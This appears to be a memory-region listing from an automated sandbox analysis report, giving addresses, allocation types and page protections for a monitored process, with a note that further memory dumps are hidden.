|
page read and write
|
||
|
4D11000
|
trusted library allocation
|
page read and write
|
||
|
298A1E82000
|
trusted library allocation
|
page read and write
|
||
|
839A000
|
heap
|
page read and write
|
||
|
1D40D8FD000
|
heap
|
page read and write
|
||
|
8386000
|
heap
|
page read and write
|
||
|
2989E445000
|
heap
|
page read and write
|
||
|
2989E1C4000
|
heap
|
page read and write
|
||
|
3B196FD000
|
stack
|
page read and write
|
||
|
1D40B840000
|
heap
|
page read and write
|
||
|
3329000
|
trusted library allocation
|
page read and write
|
||
|
3B18D9A000
|
stack
|
page read and write
|
||
|
1D40D5EE000
|
heap
|
page read and write
|
||
|
298B848E000
|
heap
|
page read and write
|
||
|
1D40D8E0000
|
heap
|
page read and write
|
||
|
85AE000
|
stack
|
page read and write
|
||
|
298A1A05000
|
trusted library allocation
|
page read and write
|
||
|
30F9000
|
heap
|
page read and write
|
||
|
54F9000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
trusted library section
|
page read and write
|
||
|
1D40B836000
|
heap
|
page read and write
|
||
|
DFC7CFB000
|
stack
|
page read and write
|
||
|
1D40D5E9000
|
heap
|
page read and write
|
||
|
DFC7A7F000
|
stack
|
page read and write
|
||
|
3308000
|
heap
|
page read and write
|
||
|
2989E3A0000
|
heap
|
page read and write
|
||
|
1D40B830000
|
heap
|
page read and write
|
||
|
DFC79FE000
|
stack
|
page read and write
|
||
|
2375E000
|
stack
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
B249000
|
direct allocation
|
page execute and read and write
|
||
|
2379F000
|
stack
|
page read and write
|
||
|
3B198FE000
|
stack
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
87DE000
|
stack
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
298B81B0000
|
heap
|
page read and write
|
||
|
31C5000
|
heap
|
page read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
2989E1B6000
|
heap
|
page read and write
|
||
|
DFC74A3000
|
stack
|
page read and write
|
||
|
C649000
|
direct allocation
|
page execute and read and write
|
||
|
8210000
|
heap
|
page read and write
|
||
|
2989E1BE000
|
heap
|
page read and write
|
||
|
8CE0000
|
direct allocation
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DE000
|
stack
|
page read and write
|
||
|
3345000
|
trusted library allocation
|
page execute and read and write
|
||
|
339B000
|
heap
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page read and write
|
||
|
2989E430000
|
heap
|
page read and write
|
||
|
7FF848C06000
|
trusted library allocation
|
page execute and read and write
|
||
|
2389E000
|
stack
|
page read and write
|
||
|
1D40D290000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
2CDC000
|
stack
|
page read and write
|
||
|
1D40B96B000
|
heap
|
page read and write
|
||
|
9BFF000
|
stack
|
page read and write
|
||
|
DFC7BF6000
|
stack
|
page read and write
|
||
|
7FF848D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C90000
|
direct allocation
|
page read and write
|
||
|
799E000
|
stack
|
page read and write
|
||
|
298A00D6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
|
8C20000
|
direct allocation
|
page read and write
|
||
|
1D40B7B0000
|
heap
|
page read and write
|
||
|
83DA000
|
heap
|
page read and write
|
||
|
9449000
|
direct allocation
|
page execute and read and write
|
||
|
1D40B826000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
233A0000
|
direct allocation
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
298A1A1F000
|
trusted library allocation
|
page read and write
|
||
|
8948000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
2989E1D6000
|
heap
|
page read and write
|
||
|
1D40B7FE000
|
heap
|
page read and write
|
||
|
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
|
303F000
|
heap
|
page read and write
|
||
|
7FF848CD1000
|
trusted library allocation
|
page read and write
|
||
|
331D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D40B830000
|
heap
|
page read and write
|
||
|
1D40B7FF000
|
heap
|
page read and write
|
||
|
1D40B969000
|
heap
|
page read and write
|
||
|
31C8000
|
heap
|
page read and write
|
||
|
1D40D8FD000
|
heap
|
page read and write
|
||
|
298A02B9000
|
trusted library allocation
|
page read and write
|
||
|
8969000
|
heap
|
page read and write
|
||
|
63C9000
|
remote allocation
|
page execute and read and write
|
||
|
839D000
|
heap
|
page read and write
|
||
|
23700000
|
heap
|
page read and write
|
||
|
71D5000
|
heap
|
page execute and read and write
|
||
|
3340000
|
trusted library allocation
|
page read and write
|
||
|
1D40B8AA000
|
heap
|
page read and write
|
||
|
79DE000
|
stack
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
8CF0000
|
direct allocation
|
page read and write
|
||
|
1D40B968000
|
heap
|
page read and write
|
||
|
298B825B000
|
heap
|
page read and write
|
||
|
8BD0000
|
trusted library allocation
|
page read and write
|
||
|
1D40D901000
|
heap
|
page read and write
|
||
|
1D40B836000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D90000
|
trusted library allocation
|
page read and write
|
||
|
7957000
|
trusted library allocation
|
page read and write
|
||
|
8C50000
|
direct allocation
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40B882000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
DFC89CE000
|
stack
|
page read and write
|
||
|
23310000
|
direct allocation
|
page read and write
|
||
|
3380000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D40B830000
|
heap
|
page read and write
|
||
|
736A000
|
stack
|
page read and write
|
||
|
73EC000
|
stack
|
page read and write
|
||
|
832A000
|
heap
|
page read and write
|
||
|
77C9000
|
remote allocation
|
page execute and read and write
|
||
|
30F6000
|
heap
|
page read and write
|
||
|
1D40B96B000
|
heap
|
page read and write
|
||
|
4BA0000
|
heap
|
page read and write
|
||
|
1D40D90C000
|
heap
|
page read and write
|
||
|
7FF848B22000
|
trusted library allocation
|
page read and write
|
||
|
83D6000
|
heap
|
page read and write
|
||
|
3342000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
1D40B790000
|
heap
|
page read and write
|
||
|
1D40D5EE000
|
heap
|
page read and write
|
||
|
8200000
|
direct allocation
|
page read and write
|
||
|
DFC75EE000
|
stack
|
page read and write
|
||
|
7FF848D02000
|
trusted library allocation
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
78A7000
|
heap
|
page read and write
|
||
|
298B8535000
|
heap
|
page read and write
|
||
|
73AE000
|
stack
|
page read and write
|
||
|
1D40B6B0000
|
heap
|
page read and write
|
||
|
8983000
|
heap
|
page read and write
|
||
|
7FF848BDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A1E000
|
stack
|
page read and write
|
||
|
1D40D934000
|
heap
|
page read and write
|
||
|
4460000
|
remote allocation
|
page execute and read and write
|
||
|
4D71000
|
trusted library allocation
|
page read and write
|
||
|
3313000
|
trusted library allocation
|
page execute and read and write
|
||
|
298B8320000
|
heap
|
page read and write
|
||
|
8BBE000
|
stack
|
page read and write
|
||
|
1D40B7F8000
|
heap
|
page read and write
|
||
|
2989E1C0000
|
heap
|
page read and write
|
||
|
2DDD000
|
stack
|
page read and write
|
||
|
7A5D000
|
stack
|
page read and write
|
||
|
8310000
|
direct allocation
|
page read and write
|
||
|
82E0000
|
direct allocation
|
page read and write
|
||
|
298B7C50000
|
trusted library allocation
|
page read and write
|
||
|
DFC78FE000
|
stack
|
page read and write
|
||
|
DFC7E79000
|
stack
|
page read and write
|
||
|
4B88000
|
trusted library allocation
|
page read and write
|
||
|
2385D000
|
stack
|
page read and write
|
||
|
89B8000
|
heap
|
page read and write
|
||
|
3B197FE000
|
stack
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BD6000
|
trusted library allocation
|
page read and write
|
||
|
298B84E0000
|
heap
|
page read and write
|
||
|
2989FC51000
|
trusted library allocation
|
page read and write
|
||
|
DFC7EFE000
|
stack
|
page read and write
|
||
|
81B0000
|
heap
|
page readonly
|
||
|
8390000
|
heap
|
page read and write
|
||
|
298B84A4000
|
heap
|
page read and write
|
||
|
1D40D5F9000
|
heap
|
page read and write
|
||
|
3087000
|
heap
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
8306000
|
heap
|
page read and write
|
||
|
2989E360000
|
heap
|
page read and write
|
||
|
1D40D8F8000
|
heap
|
page read and write
|
||
|
1D40B882000
|
heap
|
page read and write
|
||
|
2989E160000
|
heap
|
page read and write
|
||
|
298A0B1E000
|
trusted library allocation
|
page read and write
|
||
|
298B853E000
|
heap
|
page read and write
|
||
|
7FF848B24000
|
trusted library allocation
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
75E0000
|
heap
|
page read and write
|
||
|
8977000
|
heap
|
page read and write
|
||
|
298AFF3E000
|
trusted library allocation
|
page read and write
|
||
|
23320000
|
direct allocation
|
page read and write
|
||
|
8398000
|
heap
|
page read and write
|
||
|
85E0000
|
heap
|
page read and write
|
||
|
298A10AC000
|
trusted library allocation
|
page read and write
|
||
|
1D40B839000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
298A19F6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D07000
|
trusted library allocation
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
1D40B7D7000
|
heap
|
page read and write
|
||
|
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
|
4E67000
|
trusted library allocation
|
page read and write
|
||
|
1D40D624000
|
heap
|
page read and write
|
||
|
298A1DB6000
|
trusted library allocation
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page read and write
|
||
|
54FD000
|
trusted library allocation
|
page read and write
|
||
|
DFC8A4D000
|
stack
|
page read and write
|
||
|
742D000
|
stack
|
page read and write
|
||
|
23A50000
|
remote allocation
|
page read and write
|
||
|
7820000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C6E000
|
stack
|
page read and write
|
||
|
298B8530000
|
heap
|
page read and write
|
||
|
825E000
|
unkown
|
page read and write
|
||
|
7FF848D20000
|
trusted library allocation
|
page read and write
|
||
|
759E000
|
stack
|
page read and write
|
||
|
2989E170000
|
heap
|
page read and write
|
||
|
1D40D5FC000
|
heap
|
page read and write
|
||
|
23370000
|
direct allocation
|
page read and write
|
||
|
746B000
|
stack
|
page read and write
|
||
|
8C40000
|
direct allocation
|
page read and write
|
||
|
1D40D5E4000
|
heap
|
page read and write
|
||
|
790D000
|
heap
|
page read and write
|
||
|
1D40B96C000
|
heap
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
|
DFC752E000
|
stack
|
page read and write
|
||
|
8650000
|
trusted library allocation
|
page read and write
|
||
|
298B81A0000
|
heap
|
page execute and read and write
|
||
|
298B7CC3000
|
heap
|
page read and write
|
||
|
839D000
|
heap
|
page read and write
|
||
|
7FF848B3B000
|
trusted library allocation
|
page read and write
|
||
|
3370000
|
heap
|
page readonly
|
||
|
1D40B8BE000
|
heap
|
page read and write
|
||
|
70CE000
|
stack
|
page read and write
|
||
|
DFC787E000
|
stack
|
page read and write
|
||
|
7859000
|
heap
|
page read and write
|
||
|
836C000
|
heap
|
page read and write
|
||
|
1D40B8AD000
|
heap
|
page read and write
|
||
|
298A03A0000
|
trusted library allocation
|
page read and write
|
||
|
1D40B8CB000
|
heap
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
8960000
|
heap
|
page read and write
|
||
|
4FC9000
|
remote allocation
|
page execute and read and write
|
||
|
74EE000
|
stack
|
page read and write
|
||
|
298B828F000
|
heap
|
page read and write
|
||
|
298A00D9000
|
trusted library allocation
|
page read and write
|
||
|
298B846B000
|
heap
|
page read and write
|
||
|
298A19E4000
|
trusted library allocation
|
page read and write
|
||
|
1D40D5EE000
|
heap
|
page read and write
|
||
|
298A19DF000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
298A1A01000
|
trusted library allocation
|
page read and write
|
||
|
84F7000
|
stack
|
page read and write
|
||
|
8BF0000
|
trusted library allocation
|
page read and write
|
||
|
1D40B7FF000
|
heap
|
page read and write
|
||
|
86D0000
|
heap
|
page read and write
|
||
|
7FF848B23000
|
trusted library allocation
|
page execute and read and write
|
||
|
81C0000
|
heap
|
page read and write
|
||
|
2989FC40000
|
heap
|
page execute and read and write
|
||
|
7DF442C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D00000
|
direct allocation
|
page read and write
|
||
|
298B81A7000
|
heap
|
page execute and read and write
|
||
|
1D40B8C7000
|
heap
|
page read and write
|
||
|
1D40D8EA000
|
heap
|
page read and write
|
||
|
298A0201000
|
trusted library allocation
|
page read and write
|
||
|
3B190FE000
|
stack
|
page read and write
|
||
|
32F0000
|
trusted library allocation
|
page read and write
|
||
|
8820000
|
heap
|
page read and write
|
||
|
1D40B96B000
|
heap
|
page read and write
|
||
|
298B81D7000
|
heap
|
page read and write
|
||
|
1D40B96E000
|
heap
|
page read and write
|
||
|
3B191FE000
|
stack
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
|
4C2C000
|
stack
|
page read and write
|
||
|
2395F000
|
stack
|
page read and write
|
||
|
2989E203000
|
heap
|
page read and write
|
||
|
298A0214000
|
trusted library allocation
|
page read and write
|
||
|
DFC7F7C000
|
stack
|
page read and write
|
||
|
23350000
|
direct allocation
|
page read and write
|
||
|
1D40B820000
|
heap
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
1D40D600000
|
heap
|
page read and write
|
||
|
307B000
|
unkown
|
page read and write
|
||
|
23A50000
|
remote allocation
|
page read and write
|
||
|
1D40D5E0000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
298A1E4A000
|
trusted library allocation
|
page read and write
|
||
|
298A0B6B000
|
trusted library allocation
|
page read and write
|
||
|
92E0000
|
direct allocation
|
page execute and read and write
|
||
|
298B8440000
|
heap
|
page read and write
|
||
|
298B84F7000
|
heap
|
page read and write
|
||
|
1D40B80F000
|
heap
|
page read and write
|
||
|
298B7C80000
|
trusted library allocation
|
page read and write
|
||
|
78A9000
|
heap
|
page read and write
|
||
|
298A1E46000
|
trusted library allocation
|
page read and write
|
||
|
23390000
|
direct allocation
|
page read and write
|
||
|
7FF848CDA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
7849000
|
heap
|
page read and write
|
||
|
DFC8ACB000
|
stack
|
page read and write
|
||
|
5D39000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
|
1D40D8F8000
|
heap
|
page read and write
|
||
|
45C9000
|
remote allocation
|
page execute and read and write
|
||
|
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
298B84FC000
|
heap
|
page read and write
|
||
|
893C000
|
stack
|
page read and write
|
||
|
1D40D5EE000
|
heap
|
page read and write
|
||
|
23ACF000
|
stack
|
page read and write
|
||
|
DFC7DFE000
|
stack
|
page read and write
|
||
|
59C9000
|
remote allocation
|
page execute and read and write
|
||
|
9E49000
|
direct allocation
|
page execute and read and write
|
||
|
2989FE76000
|
trusted library allocation
|
page read and write
|
||
|
298A0B49000
|
trusted library allocation
|
page read and write
|
||
|
1D40D8E1000
|
heap
|
page read and write
|
||
|
1D40B882000
|
heap
|
page read and write
|
||
|
897F000
|
heap
|
page read and write
|
||
|
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
|
2989E17D000
|
heap
|
page read and write
|
||
|
5D7B000
|
trusted library allocation
|
page read and write
|
||
|
23A50000
|
remote allocation
|
page read and write
|
||
|
8940000
|
heap
|
page read and write
|
||
|
1D40D94A000
|
heap
|
page read and write
|
||
|
8BC0000
|
trusted library allocation
|
page read and write
|
||
|
1D40B8B6000
|
heap
|
page read and write
|
||
|
8BE0000
|
trusted library allocation
|
page read and write
|
||
|
298A00E5000
|
trusted library allocation
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D40D60C000
|
heap
|
page read and write
|
||
|
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
|
1D40B8A3000
|
heap
|
page read and write
|
||
|
298A00FB000
|
trusted library allocation
|
page read and write
|
||
|
71CD000
|
stack
|
page read and write
|
||
|
298B8208000
|
heap
|
page read and write
|
||
|
7FF848B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8CC0000
|
direct allocation
|
page read and write
|
||
|
8CD0000
|
direct allocation
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
1D40D5EE000
|
heap
|
page read and write
|
||
|
239EE000
|
stack
|
page read and write
|
||
|
7FF848D05000
|
trusted library allocation
|
page read and write
|
||
|
1D40D93C000
|
heap
|
page read and write
|
||
|
1D40B96B000
|
heap
|
page read and write
|
||
|
298A0795000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
|
298A00E1000
|
trusted library allocation
|
page read and write
|
||
|
8C70000
|
direct allocation
|
page read and write
|
||
|
298A1E64000
|
trusted library allocation
|
page read and write
|
||
|
2989E3F0000
|
trusted library allocation
|
page read and write
|
||
|
1D40D901000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
3078000
|
unkown
|
page read and write
|
||
|
714E000
|
stack
|
page read and write
|
||
|
298A04CC000
|
trusted library allocation
|
page read and write
|
||
|
2989E1FD000
|
heap
|
page read and write
|
||
|
2989E3E0000
|
heap
|
page read and write
|
||
|
1D40D5E1000
|
heap
|
page read and write
|
||
|
3B194FE000
|
stack
|
page read and write
|
||
|
DFC894E000
|
stack
|
page read and write
|
||
|
1D40B8BB000
|
heap
|
page read and write
|
||
|
298AFC51000
|
trusted library allocation
|
page read and write
|
||
|
7940000
|
heap
|
page execute and read and write
|
||
|
239AD000
|
stack
|
page read and write
|
||
|
23A8E000
|
stack
|
page read and write
|
||
|
23B1C000
|
stack
|
page read and write
|
||
|
2989FBF0000
|
trusted library allocation
|
page read and write
|
||
|
1D40D932000
|
heap
|
page read and write
|
||
|
1D40D655000
|
heap
|
page read and write
|
||
|
23B5C000
|
stack
|
page read and write
|
||
|
886C000
|
stack
|
page read and write
|
||
|
2989E1FF000
|
heap
|
page read and write
|
||
|
4BEE000
|
stack
|
page read and write
|
||
|
8300000
|
heap
|
page read and write
|
||
|
307E000
|
unkown
|
page read and write
|
||
|
75DE000
|
stack
|
page read and write
|
||
|
8C60000
|
direct allocation
|
page read and write
|
||
|
88FE000
|
stack
|
page read and write
|
||
|
298B8420000
|
heap
|
page execute and read and write
|
||
|
82DE000
|
stack
|
page read and write
|
||
|
1D40D5EA000
|
heap
|
page read and write
|
||
|
2989E410000
|
trusted library allocation
|
page read and write
|
||
|
298A1B68000
|
trusted library allocation
|
page read and write
|
||
|
8C30000
|
direct allocation
|
page read and write
|
||
|
23330000
|
direct allocation
|
page read and write
|
||
|
74AE000
|
stack
|
page read and write
|
||
|
DFC7D7E000
|
stack
|
page read and write
|
||
|
710F000
|
stack
|
page read and write
|
||
|
23340000
|
direct allocation
|
page read and write
|
||
|
5D84000
|
trusted library allocation
|
page read and write
|
||
|
2989E420000
|
heap
|
page readonly
|
||
|
DFC7C78000
|
stack
|
page read and write
|
||
|
3075000
|
unkown
|
page read and write
|
||
|
8C80000
|
direct allocation
|
page read and write
|
||
|
298A0B34000
|
trusted library allocation
|
page read and write
|
There are 515 hidden memdumps, click here to show them.